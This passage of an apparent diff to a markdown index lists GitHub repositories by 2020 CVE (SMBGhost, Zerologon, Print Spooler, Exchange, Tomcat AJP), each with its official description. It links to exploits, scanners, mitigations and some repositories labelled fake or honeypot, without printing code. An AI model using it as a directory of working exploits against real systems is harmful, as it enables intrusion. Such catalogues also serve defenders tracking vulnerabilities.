[onSec-fr/CVE-2020-0688-Scanner](https://github.com/onSec-fr/CVE-2020-0688-Scanner) +- [youncyb/CVE-2020-0688](https://github.com/youncyb/CVE-2020-0688) +- [zcgonvh/CVE-2020-0688](https://github.com/zcgonvh/CVE-2020-0688) +- [justin-p/PSForgot2kEyXCHANGE](https://github.com/justin-p/PSForgot2kEyXCHANGE) +- [cert-lv/CVE-2020-0688](https://github.com/cert-lv/CVE-2020-0688) +- [ravinacademy/CVE-2020-0688](https://github.com/ravinacademy/CVE-2020-0688) +- [mahyarx/Exploit_CVE-2020-0688](https://github.com/mahyarx/Exploit_CVE-2020-0688) +- [ktpdpro/CVE-2020-0688](https://github.com/ktpdpro/CVE-2020-0688) +- [w4fz5uck5/cve-2020-0688-webshell-upload-technique](https://github.com/w4fz5uck5/cve-2020-0688-webshell-upload-technique) +- [murataydemir/CVE-2020-0688](https://github.com/murataydemir/CVE-2020-0688) +- [zyn3rgy/ecp_slap](https://github.com/zyn3rgy/ecp_slap) +- [SLSteff/CVE-2020-0688-Scanner](https://github.com/SLSteff/CVE-2020-0688-Scanner) +- [MrTiz/CVE-2020-0688](https://github.com/MrTiz/CVE-2020-0688) +- [ann0906/proxylogon](https://github.com/ann0906/proxylogon) +- [7heKnight/CVE-2020-0688](https://github.com/7heKnight/CVE-2020-0688) +- [1337-llama/CVE-2020-0688-Python3](https://github.com/1337-llama/CVE-2020-0688-Python3) +- [chudamax/CVE-2020-0688-Exchange2010](https://github.com/chudamax/CVE-2020-0688-Exchange2010) +- [W01fh4cker/CVE-2020-0688-GUI](https://github.com/W01fh4cker/CVE-2020-0688-GUI) + +### CVE-2020-0728 (2020-02-11) + +An information vulnerability exists when Windows Modules Installer Service improperly discloses file information, aka 'Windows Modules Installer Service Information Disclosure Vulnerability'. + + +- [irsl/CVE-2020-0728](https://github.com/irsl/CVE-2020-0728) + +### CVE-2020-0753 (2020-02-11) + +An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files, aka 'Windows Error Reporting Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0754. + + +- [afang5472/CVE-2020-0753-and-CVE-2020-0754](https://github.com/afang5472/CVE-2020-0753-and-CVE-2020-0754) +- [VikasVarshney/CVE-2020-0753-and-CVE-2020-0754](https://github.com/VikasVarshney/CVE-2020-0753-and-CVE-2020-0754) + +### CVE-2020-0787 (2020-03-12) + +An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) improperly handles symbolic links, aka 'Windows Background Intelligent Transfer Service Elevation of Privilege Vulnerability'. + + +- [cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION](https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION) +- [MasterSploit/CVE-2020-0787](https://github.com/MasterSploit/CVE-2020-0787) +- [MasterSploit/CVE-2020-0787-BitsArbitraryFileMove-master](https://github.com/MasterSploit/CVE-2020-0787-BitsArbitraryFileMove-master) +- [yanghaoi/CVE-2020-0787](https://github.com/yanghaoi/CVE-2020-0787) + +### CVE-2020-0796 (2020-03-12) + +A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests, aka 'Windows SMBv3 Client/Server Remote Code Execution Vulnerability'. + + +- [k8gege/PyLadon](https://github.com/k8gege/PyLadon) +- [0x25bit/CVE-2020-0796-PoC](https://github.com/0x25bit/CVE-2020-0796-PoC) +- [technion/DisableSMBCompression](https://github.com/technion/DisableSMBCompression) +- [T13nn3s/CVE-2020-0796](https://github.com/T13nn3s/CVE-2020-0796) +- [ly4k/SMBGhost](https://github.com/ly4k/SMBGhost) +- [joaozietolie/CVE-2020-0796-Checker](https://github.com/joaozietolie/CVE-2020-0796-Checker) +- [ButrintKomoni/cve-2020-0796](https://github.com/ButrintKomoni/cve-2020-0796) +- [dickens88/cve-2020-0796-scanner](https://github.com/dickens88/cve-2020-0796-scanner) +- [kn6869610/CVE-2020-0796](https://github.com/kn6869610/CVE-2020-0796) +- [awareseven/eternalghosttest](https://github.com/awareseven/eternalghosttest) +- [xax007/CVE-2020-0796-Scanner](https://github.com/xax007/CVE-2020-0796-Scanner) +- [Dhoomralochana/Scanners-for-CVE-2020-0796-Testing](https://github.com/Dhoomralochana/Scanners-for-CVE-2020-0796-Testing) +- [UraSecTeam/smbee](https://github.com/UraSecTeam/smbee) +- [netscylla/SMBGhost](https://github.com/netscylla/SMBGhost) +- [eerykitty/CVE-2020-0796-PoC](https://github.com/eerykitty/CVE-2020-0796-PoC) +- [wneessen/SMBCompScan](https://github.com/wneessen/SMBCompScan) +- [ioncodes/SMBGhost](https://github.com/ioncodes/SMBGhost) +- [laolisafe/CVE-2020-0796](https://github.com/laolisafe/CVE-2020-0796) +- [gabimarti/SMBScanner](https://github.com/gabimarti/SMBScanner) +- [Almorabea/SMBGhost-WorkaroundApplier](https://github.com/Almorabea/SMBGhost-WorkaroundApplier) +- [vysecurity/CVE-2020-0796](https://github.com/vysecurity/CVE-2020-0796) +- [BinaryShadow94/SMBv3.1.1-scan---CVE-2020-0796](https://github.com/BinaryShadow94/SMBv3.1.1-scan---CVE-2020-0796) +- [w1ld3r/SMBGhost_Scanner](https://github.com/w1ld3r/SMBGhost_Scanner) +- [wsfengfan/CVE-2020-0796](https://github.com/wsfengfan/CVE-2020-0796) +- [GuoKerS/aioScan_CVE-2020-0796](https://github.com/GuoKerS/aioScan_CVE-2020-0796) +- [jiansiting/CVE-2020-0796-Scanner](https://github.com/jiansiting/CVE-2020-0796-Scanner) +- [maxpl0it/Unauthenticated-CVE-2020-0796-PoC](https://github.com/maxpl0it/Unauthenticated-CVE-2020-0796-PoC) +- [ran-sama/CVE-2020-0796](https://github.com/ran-sama/CVE-2020-0796) +- [sujitawake/smbghost](https://github.com/sujitawake/smbghost) +- [julixsalas/CVE-2020-0796](https://github.com/julixsalas/CVE-2020-0796) +- [cory-zajicek/CVE-2020-0796-DoS](https://github.com/cory-zajicek/CVE-2020-0796-DoS) +- [tripledd/cve-2020-0796-vuln](https://github.com/tripledd/cve-2020-0796-vuln) +- [danigargu/CVE-2020-0796](https://github.com/danigargu/CVE-2020-0796) +- [jamf/CVE-2020-0796-LPE-POC](https://github.com/jamf/CVE-2020-0796-LPE-POC) +- [TinToSer/CVE-2020-0796-LPE](https://github.com/TinToSer/CVE-2020-0796-LPE) +- [f1tz/CVE-2020-0796-LPE-EXP](https://github.com/f1tz/CVE-2020-0796-LPE-EXP) +- [tango-j/CVE-2020-0796](https://github.com/tango-j/CVE-2020-0796) +- [jiansiting/CVE-2020-0796](https://github.com/jiansiting/CVE-2020-0796) +- [eastmountyxz/CVE-2020-0796-SMB](https://github.com/eastmountyxz/CVE-2020-0796-SMB) +- [LabDookhtegan/CVE-2020-0796-EXP](https://github.com/LabDookhtegan/CVE-2020-0796-EXP) +- [Rvn0xsy/CVE_2020_0796_CNA](https://github.com/Rvn0xsy/CVE_2020_0796_CNA) +- [0xeb-bp/cve-2020-0796](https://github.com/0xeb-bp/cve-2020-0796) +- [intelliroot-tech/cve-2020-0796-Scanner](https://github.com/intelliroot-tech/cve-2020-0796-Scanner) +- [jamf/CVE-2020-0796-RCE-POC](https://github.com/jamf/CVE-2020-0796-RCE-POC) +- [thelostworldFree/CVE-2020-0796](https://github.com/thelostworldFree/CVE-2020-0796) +- [section-c/CVE-2020-0796](https://github.com/section-c/CVE-2020-0796) +- [bacth0san96/SMBGhostScanner](https://github.com/bacth0san96/SMBGhostScanner) +- [halsten/CVE-2020-0796](https://github.com/halsten/CVE-2020-0796) +- [ysyyrps123/CVE-2020-0796](https://github.com/ysyyrps123/CVE-2020-0796) +- [ysyyrps123/CVE-2020-0796-exp](https://github.com/ysyyrps123/CVE-2020-0796-exp) +- [exp-sky/CVE-2020-0796](https://github.com/exp-sky/CVE-2020-0796) +- [Barriuso/SMBGhost_AutomateExploitation](https://github.com/Barriuso/SMBGhost_AutomateExploitation) +- [1060275195/SMBGhost](https://github.com/1060275195/SMBGhost) +- [Almorabea/SMBGhost-LPE-Metasploit-Module](https://github.com/Almorabea/SMBGhost-LPE-Metasploit-Module) +- [jamf/SMBGhost-SMBleed-scanner](https://github.com/jamf/SMBGhost-SMBleed-scanner) +- [rsmudge/CVE-2020-0796-BOF](https://github.com/rsmudge/CVE-2020-0796-BOF) +- [codewithpradhan/SMBGhost-CVE-2020-0796-](https://github.com/codewithpradhan/SMBGhost-CVE-2020-0796-) +- [AaronCaiii/CVE-2020-0796-POC](https://github.com/AaronCaiii/CVE-2020-0796-POC) +- [datntsec/CVE-2020-0796](https://github.com/datntsec/CVE-2020-0796) +- [MasterSploit/LPE---CVE-2020-0796](https://github.com/MasterSploit/LPE---CVE-2020-0796) +- [1stPeak/CVE-2020-0796-Scanner](https://github.com/1stPeak/CVE-2020-0796-Scanner) +- [Anonimo501/SMBGhost_CVE-2020-0796_checker](https://github.com/Anonimo501/SMBGhost_CVE-2020-0796_checker) +- [Opensitoo/cve-2020-0796](https://github.com/Opensitoo/cve-2020-0796) +- [orangmuda/CVE-2020-0796](https://github.com/orangmuda/CVE-2020-0796) +- [Murasame-nc/CVE-2020-0796-LPE-POC](https://github.com/Murasame-nc/CVE-2020-0796-LPE-POC) +- [F6JO/CVE-2020-0796-Batch-scanning](https://github.com/F6JO/CVE-2020-0796-Batch-scanning) +- [lisinan988/CVE-2020-0796-exp](https://github.com/lisinan988/CVE-2020-0796-exp) +- [vsai94/ECE9069_SMBGhost_Exploit_CVE-2020-0796-](https://github.com/vsai94/ECE9069_SMBGhost_Exploit_CVE-2020-0796-) +- [arzuozkan/CVE-2020-0796](https://github.com/arzuozkan/CVE-2020-0796) +- [SEHandler/CVE-2020-0796](https://github.com/SEHandler/CVE-2020-0796) +- [TweatherQ/CVE-2020-0796](https://github.com/TweatherQ/CVE-2020-0796) +- [krizzz07/CVE-2020-0796](https://github.com/krizzz07/CVE-2020-0796) +- [OldDream666/cve-2020-0796](https://github.com/OldDream666/cve-2020-0796) +- [Ajomix/CVE-2020-0796](https://github.com/Ajomix/CVE-2020-0796) +- [hungdnvp/POC-CVE-2020-0796](https://github.com/hungdnvp/POC-CVE-2020-0796) +- [AdamSonov/smbGhostCVE-2020-0796](https://github.com/AdamSonov/smbGhostCVE-2020-0796) +- [z3ena/Exploiting-and-Mitigating-CVE-2020-0796-SMBGhost-and-Print-Spooler-Vulnerabilities](https://github.com/z3ena/Exploiting-and-Mitigating-CVE-2020-0796-SMBGhost-and-Print-Spooler-Vulnerabilities) + +### CVE-2020-0887 (2020-03-12) + +An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0788, CVE-2020-0877. + + +- [vinhthp1712/CVE-2020-0887](https://github.com/vinhthp1712/CVE-2020-0887) + +### CVE-2020-0890 (2020-09-11) + +<p>A denial of service vulnerability exists when Microsoft Hyper-V on a host server fails to properly validate specific malicious data from a user on a guest operating system.</p>\n<p>To exploit the vulnerability, an attacker who already has a privileged account on a guest operating system, running as a virtual machine, could run a specially crafted application.</p>\n<p>The security update addresses the vulnerability by resolving the conditions where Hyper-V would fail to handle these requests.</p>\n + + +- [gerhart01/hyperv_local_dos_poc](https://github.com/gerhart01/hyperv_local_dos_poc) +- [skasanagottu57gmailv/gerhart01](https://github.com/skasanagottu57gmailv/gerhart01) +- [MarcelloTinocor/gerhart01](https://github.com/MarcelloTinocor/gerhart01) + +### CVE-2020-0910 (2020-04-15) + +A remote code execution vulnerability exists when Windows Hyper-V on a host server fails to properly validate input from an authenticated user on a guest operating system, aka 'Windows Hyper-V Remote Code Execution Vulnerability'. + + +- [kfmgang/CVE-2020-0910](https://github.com/kfmgang/CVE-2020-0910) + +### CVE-2020-0976 (2020-04-15) + +A spoofing vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft SharePoint Spoofing Vulnerability'. This CVE ID is unique from CVE-2020-0972, CVE-2020-0975, CVE-2020-0977. + + +- [ericzhong2010/GUI-Check-CVE-2020-0976](https://github.com/ericzhong2010/GUI-Check-CVE-2020-0976) + +### CVE-2020-1015 (2020-04-15) + +An elevation of privilege vulnerability exists in the way that the User-Mode Power Service (UMPS) handles objects in memory, aka 'Windows Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-0934, CVE-2020-0983, CVE-2020-1009, CVE-2020-1011. + + +- [0xeb-bp/cve-2020-1015](https://github.com/0xeb-bp/cve-2020-1015) + +### CVE-2020-1020 (2020-04-15) + +A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format.For all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely, aka 'Adobe Font Manager Library Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-0938. + + +- [CrackerCat/CVE-2020-1020-Exploit](https://github.com/CrackerCat/CVE-2020-1020-Exploit) +- [KaLendsi/CVE-2020-1020](https://github.com/KaLendsi/CVE-2020-1020) + +### CVE-2020-1034 (2020-09-11) + +<p>An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.</p>\n<p>To exploit the vulnerability, a locally authenticated attacker could run a specially crafted application.</p>\n<p>The security update addresses the vulnerability by ensuring the Windows Kernel properly handles objects in memory.</p>\n + + +- [yardenshafir/CVE-2020-1034](https://github.com/yardenshafir/CVE-2020-1034) +- [GeorgiiFirsov/CVE-2020-1034](https://github.com/GeorgiiFirsov/CVE-2020-1034) + +### CVE-2020-1048 (2020-05-21) + +An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system, aka 'Windows Print Spooler Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1070. + + +- [zveriu/CVE-2009-0229-PoC](https://github.com/zveriu/CVE-2009-0229-PoC) +- [shubham0d/CVE-2020-1048](https://github.com/shubham0d/CVE-2020-1048) +- [Ken-Abruzzi/CVE-2020-1048](https://github.com/Ken-Abruzzi/CVE-2020-1048) +- [Y3A/cve-2020-1048](https://github.com/Y3A/cve-2020-1048) + +### CVE-2020-1054 (2020-05-21) + +An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, aka 'Win32k Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1143. + + +- [0xeb-bp/cve-2020-1054](https://github.com/0xeb-bp/cve-2020-1054) +- [Iamgublin/CVE-2020-1054](https://github.com/Iamgublin/CVE-2020-1054) +- [KaLendsi/CVE-2020-1054](https://github.com/KaLendsi/CVE-2020-1054) +- [Graham382/CVE-2020-1054](https://github.com/Graham382/CVE-2020-1054) + +### CVE-2020-1066 (2020-05-21) + +An elevation of privilege vulnerability exists in .NET Framework which could allow an attacker to elevate their privilege level.To exploit the vulnerability, an attacker would first have to access the local machine, and then run a malicious program.The update addresses the vulnerability by correcting how .NET Framework activates COM objects., aka '.NET Framework Elevation of Privilege Vulnerability'. + + +- [cbwang505/CVE-2020-1066-EXP](https://github.com/cbwang505/CVE-2020-1066-EXP) +- [xyddnljydd/cve-2020-1066](https://github.com/xyddnljydd/cve-2020-1066) + +### CVE-2020-1102 (2020-05-21) + +A remote code execution vulnerability exists in Microsoft SharePoint when the software fails to check the source markup of an application package, aka 'Microsoft SharePoint Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1023, CVE-2020-1024. + + +- [DanielRuf/snyk-js-jquery-565129](https://github.com/DanielRuf/snyk-js-jquery-565129) + +### CVE-2020-1206 (2020-06-09) + +An information disclosure vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests, aka 'Windows SMBv3 Client/Server Information Disclosure Vulnerability'. + + +- [jamf/CVE-2020-1206-POC](https://github.com/jamf/CVE-2020-1206-POC) +- [Info-Security-Solution-Kolkata/CVE-2020-1206-Exploit](https://github.com/Info-Security-Solution-Kolkata/CVE-2020-1206-Exploit) +- [Info-Security-Solution-Kolkata/Smbleed-CVE-2020-1206-Exploit](https://github.com/Info-Security-Solution-Kolkata/Smbleed-CVE-2020-1206-Exploit) +- [datntsec/CVE-2020-1206](https://github.com/datntsec/CVE-2020-1206) + +### CVE-2020-1283 (2020-06-09) + +A denial of service vulnerability exists when Windows improperly handles objects in memory, aka 'Windows Denial of Service Vulnerability'. + + +- [RedyOpsResearchLabs/CVE-2020-1283_Windows-Denial-of-Service-Vulnerability](https://github.com/RedyOpsResearchLabs/CVE-2020-1283_Windows-Denial-of-Service-Vulnerability) + +### CVE-2020-1301 (2020-06-09) + +A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests, aka 'Windows SMB Remote Code Execution Vulnerability'. + + +- [shubham0d/CVE-2020-1301](https://github.com/shubham0d/CVE-2020-1301) + +### CVE-2020-1313 (2020-06-09) + +An elevation of privilege vulnerability exists when the Windows Update Orchestrator Service improperly handles file operations, aka 'Windows Update Orchestrator Service Elevation of Privilege Vulnerability'. + + +- [irsl/CVE-2020-1313](https://github.com/irsl/CVE-2020-1313) + +### CVE-2020-1337 (2020-08-17) + +An elevation of privilege vulnerability exists when the Windows Print Spooler service improperly allows arbitrary writing to the file system. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\nTo exploit this vulnerability, an attacker would have to log on to an affected system and run a specially crafted script or application.\nThe update addresses the vulnerability by correcting how the Windows Print Spooler Component writes to the file system.\n + + +- [math1as/CVE-2020-1337-exploit](https://github.com/math1as/CVE-2020-1337-exploit) +- [VoidSec/CVE-2020-1337](https://github.com/VoidSec/CVE-2020-1337) +- [neofito/CVE-2020-1337](https://github.com/neofito/CVE-2020-1337) +- [sailay1996/cve-2020-1337-poc](https://github.com/sailay1996/cve-2020-1337-poc) +- [ZTK-009/cve-2020-1337-poc](https://github.com/ZTK-009/cve-2020-1337-poc) + +### CVE-2020-1349 (2020-07-14) + +A remote code execution vulnerability exists in Microsoft Outlook software when it fails to properly handle objects in memory, aka 'Microsoft Outlook Remote Code Execution Vulnerability'. + + +- [0neb1n/CVE-2020-1349](https://github.com/0neb1n/CVE-2020-1349) + +### CVE-2020-1350 (2020-07-14) + +A remote code execution vulnerability exists in Windows Domain Name System servers when they fail to properly handle requests, aka 'Windows DNS Server Remote Code Execution Vulnerability'. + + +- [psc4re/NSE-scripts](https://github.com/psc4re/NSE-scripts) +- [ZephrFish/CVE-2020-1350_HoneyPoC](https://github.com/ZephrFish/CVE-2020-1350_HoneyPoC) +- [mr-r3b00t/CVE-2020-1350](https://github.com/mr-r3b00t/CVE-2020-1350) +- [zoomerxsec/Fake_CVE-2020-1350](https://github.com/zoomerxsec/Fake_CVE-2020-1350) +- [T13nn3s/CVE-2020-1350](https://github.com/T13nn3s/CVE-2020-1350) +- [corelight/SIGRed](https://github.com/corelight/SIGRed) +- [jmaddington/dRMM-CVE-2020-1350-response](https://github.com/jmaddington/dRMM-CVE-2020-1350-response) +- [maxpl0it/CVE-2020-1350-DoS](https://github.com/maxpl0it/CVE-2020-1350-DoS) +- [captainGeech42/CVE-2020-1350](https://github.com/captainGeech42/CVE-2020-1350) +- [connormcgarr/CVE-2020-1350](https://github.com/connormcgarr/CVE-2020-1350) +- [graph-inc/CVE-2020-1350](https://github.com/graph-inc/CVE-2020-1350) +- [CVEmaster/CVE-2020-1350](https://github.com/CVEmaster/CVE-2020-1350) +- [gdwnet/cve-2020-1350](https://github.com/gdwnet/cve-2020-1350) +- [simeononsecurity/CVE-2020-1350-Fix](https://github.com/simeononsecurity/CVE-2020-1350-Fix) + +### CVE-2020-1362 (2020-07-14) + +An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory, aka 'Windows WalletService Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1344, CVE-2020-1369. + + +- [Q4n/CVE-2020-1362](https://github.com/Q4n/CVE-2020-1362) + +### CVE-2020-1472 (2020-08-17) + +An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC). An attacker who successfully exploited the vulnerability could run a specially crafted application on a device on the network.\nTo exploit the vulnerability, an unauthenticated attacker would be required to use MS-NRPC to connect to a domain controller to obtain domain administrator access.\nMicrosoft is addressing the vulnerability in a phased two-part rollout. These updates address the vulnerability by modifying how Netlogon handles the usage of Netlogon secure channels.\nFor guidelines on how to manage the changes required for this vulnerability and more information on the phased rollout, see How to manage the changes in Netlogon secure channel connections associated with CVE-2020-1472 (updated September 28, 2020).\nWhen the second phase of Windows updates become available in Q1 2021, customers will be notified via a revision to this security vulnerability. If you wish to be notified when these updates are released, we recommend that you register for the security notifications mailer to be alerted of content changes to this advisory. See Microsoft Technical Security Notifications.\n + + +- [Tobey123/CVE-2020-1472-visualizer](https://github.com/Tobey123/CVE-2020-1472-visualizer) +- [SecuraBV/CVE-2020-1472](https://github.com/SecuraBV/CVE-2020-1472) +- [cube0x0/CVE-2020-1472](https://github.com/cube0x0/CVE-2020-1472) +- [dirkjanm/CVE-2020-1472](https://github.com/dirkjanm/CVE-2020-1472) +- [VoidSec/CVE-2020-1472](https://github.com/VoidSec/CVE-2020-1472) +- [risksense/zerologon](https://github.com/risksense/zerologon) +- [bb00/zer0dump](https://github.com/bb00/zer0dump) +- [0xkami/CVE-2020-1472](https://github.com/0xkami/CVE-2020-1472) +- [NAXG/CVE-2020-1472](https://github.com/NAXG/CVE-2020-1472) +- [thatonesecguy/zerologon-CVE-2020-1472](https://github.com/thatonesecguy/zerologon-CVE-2020-1472) +- [k8gege/CVE-2020-1472-EXP](https://github.com/k8gege/CVE-2020-1472-EXP) +- [jiushill/CVE-2020-1472](https://github.com/jiushill/CVE-2020-1472) +- [McKinnonIT/zabbix-template-CVE-2020-1472](https://github.com/McKinnonIT/zabbix-template-CVE-2020-1472) +- [mstxq17/cve-2020-1472](https://github.com/mstxq17/cve-2020-1472) +- [Fa1c0n35/CVE-2020-1472](https://github.com/Fa1c0n35/CVE-2020-1472) +- [Fa1c0n35/SecuraBV-CVE-2020-1472](https://github.com/Fa1c0n35/SecuraBV-CVE-2020-1472) +- [CanciuCostin/CVE-2020-1472](https://github.com/CanciuCostin/CVE-2020-1472) +- [0xcccc666/cve-2020-1472_Tool-collection](https://github.com/0xcccc666/cve-2020-1472_Tool-collection) +- [murataydemir/CVE-2020-1472](https://github.com/murataydemir/CVE-2020-1472) +- [npocmak/CVE-2020-1472](https://github.com/npocmak/CVE-2020-1472) +- [victim10wq3/CVE-2020-1472](https://github.com/victim10wq3/CVE-2020-1472) +- [zeronetworks/zerologon](https://github.com/zeronetworks/zerologon) +- [sv3nbeast/CVE-2020-1472](https://github.com/sv3nbeast/CVE-2020-1472) +- [midpipps/CVE-2020-1472-Easy](https://github.com/midpipps/CVE-2020-1472-Easy) +- [hectorgie/CVE-2020-1472](https://github.com/hectorgie/CVE-2020-1472) +- [johnpathe/zerologon-cve-2020-1472-notes](https://github.com/johnpathe/zerologon-cve-2020-1472-notes) +- [t31m0/CVE-2020-1472](https://github.com/t31m0/CVE-2020-1472) +- [grupooruss/CVE-2020-1472](https://github.com/grupooruss/CVE-2020-1472) +- [striveben/CVE-2020-1472](https://github.com/striveben/CVE-2020-1472) +- [Fa1c0n35/CVE-2020-1472-02-](https://github.com/Fa1c0n35/CVE-2020-1472-02-) +- [Whippet0/CVE-2020-1472](https://github.com/Whippet0/CVE-2020-1472) +- [WiIs0n/Zerologon_CVE-2020-1472](https://github.com/WiIs0n/Zerologon_CVE-2020-1472) +- [Privia-Security/ADZero](https://github.com/Privia-Security/ADZero) +- [Ken-Abruzzi/cve-2020-1472](https://github.com/Ken-Abruzzi/cve-2020-1472) +- [rhymeswithmogul/Set-ZerologonMitigation](https://github.com/rhymeswithmogul/Set-ZerologonMitigation) +- [shanfenglan/cve-2020-1472](https://github.com/shanfenglan/cve-2020-1472) +- [maikelnight/zerologon](https://github.com/maikelnight/zerologon) +- [CPO-EH/CVE-2020-1472_ZeroLogonChecker](https://github.com/CPO-EH/CVE-2020-1472_ZeroLogonChecker) +- [puckiestyle/CVE-2020-1472](https://github.com/puckiestyle/CVE-2020-1472) +- [mingchen-script/CVE-2020-1472-visualizer](https://github.com/mingchen-script/CVE-2020-1472-visualizer) +- [JayP232/The_big_Zero](https://github.com/JayP232/The_big_Zero) +- [b1ack0wl/CVE-2020-1472](https://github.com/b1ack0wl/CVE-2020-1472) +- [SaharAttackit/CVE-2020-1472](https://github.com/SaharAttackit/CVE-2020-1472) +- [wrathfulDiety/zerologon](https://github.com/wrathfulDiety/zerologon) +- [YossiSassi/ZeroLogon-Exploitation-Check](https://github.com/YossiSassi/ZeroLogon-Exploitation-Check) +- [sho-luv/zerologon](https://github.com/sho-luv/zerologon) +- [hell-moon/ZeroLogon-Exploit](https://github.com/hell-moon/ZeroLogon-Exploit) +- [Udyz/Zerologon](https://github.com/Udyz/Zerologon) +- [itssmikefm/CVE-2020-1472](https://github.com/itssmikefm/CVE-2020-1472) +- [B34MR/zeroscan](https://github.com/B34MR/zeroscan) +- [TheJoyOfHacking/SecuraBV-CVE-2020-1472](https://github.com/TheJoyOfHacking/SecuraBV-CVE-2020-1472) +- [TheJoyOfHacking/dirkjanm-CVE-2020-1472](https://github.com/TheJoyOfHacking/dirkjanm-CVE-2020-1472) +- [Anonymous-Family/Zero-day-scanning](https://github.com/Anonymous-Family/Zero-day-scanning) +- [Anonymous-Family/CVE-2020-1472](https://github.com/Anonymous-Family/CVE-2020-1472) +- [carlos55ml/zerologon](https://github.com/carlos55ml/zerologon) +- [Rvn0xsy/ZeroLogon](https://github.com/Rvn0xsy/ZeroLogon) +- [guglia001/MassZeroLogon](https://github.com/guglia001/MassZeroLogon) +- [likeww/MassZeroLogon](https://github.com/likeww/MassZeroLogon) +- [dr4g0n23/CVE-2020-1472](https://github.com/dr4g0n23/CVE-2020-1472) +- [RicYaben/CVE-2020-1472-LAB](https://github.com/RicYaben/CVE-2020-1472-LAB) +- [Akash7350/CVE-2020-1472](https://github.com/Akash7350/CVE-2020-1472) +- [c3rrberu5/ZeroLogon-to-Shell](https://github.com/c3rrberu5/ZeroLogon-to-Shell) +- [logg-1/0logon](https://github.com/logg-1/0logon) +- [whoami-chmod777/Zerologon-Attack-CVE-2020-1472-POC](https://github.com/whoami-chmod777/Zerologon-Attack-CVE-2020-1472-POC) +- [JolynNgSC/Zerologon_CVE-2020-1472](https://github.com/JolynNgSC/Zerologon_CVE-2020-1472) +- [blackh00d/zerologon-poc](https://github.com/blackh00d/zerologon-poc) + +### CVE-2020-1493 (2020-08-17) + +An information disclosure vulnerability exists when attaching files to Outlook messages. This vulnerability could potentially allow users to share attached files such that they are accessible by anonymous users where they should be restricted to specific users.\nTo exploit this vulnerability, an attacker would have to attach a file as a link to an email. The email could then be shared with individuals that should not have access to the files, ignoring the default organizational setting.\nThe security update addresses the vulnerability by correcting how Outlook handles file attachment links.\n + + +- [0neb1n/CVE-2020-1493](https://github.com/0neb1n/CVE-2020-1493) + +### CVE-2020-1611 (2020-01-15) + +A Local File Inclusion vulnerability in Juniper Networks Junos Space allows an attacker to view all files on the target when the device receives malicious HTTP packets. This issue affects: Juniper Networks Junos Space versions prior to 19.4R1. + + +- [Ibonok/CVE-2020-1611](https://github.com/Ibonok/CVE-2020-1611) + +### CVE-2020-1764 (2020-03-26) + +A hard-coded cryptographic key vulnerability in the default configuration file was found in Kiali, all versions prior to 1.15.1. A remote attacker could abuse this flaw by creating their own JWT signed tokens and bypass Kiali authentication mechanisms, possibly gaining privileges to view and alter the Istio configuration. + + +- [jpts/cve-2020-1764-poc](https://github.com/jpts/cve-2020-1764-poc) + +### CVE-2020-1937 (2020-02-24) + +Kylin has some restful apis which will concatenate SQLs with the user input string, a user is likely to be able to run malicious database queries. + + +- [shanika04/apache_kylin](https://github.com/shanika04/apache_kylin) + +### CVE-2020-1938 (2020-02-24) + +When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed: - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations. + + +- [xindongzhuaizhuai/CVE-2020-1938](https://github.com/xindongzhuaizhuai/CVE-2020-1938) +- [sgdream/CVE-2020-1938](https://github.com/sgdream/CVE-2020-1938) +- [nibiwodong/CNVD-2020-10487-Tomcat-ajp-POC](https://github.com/nibiwodong/CNVD-2020-10487-Tomcat-ajp-POC) +- [bkfish/CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner](https://github.com/bkfish/CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner) +- 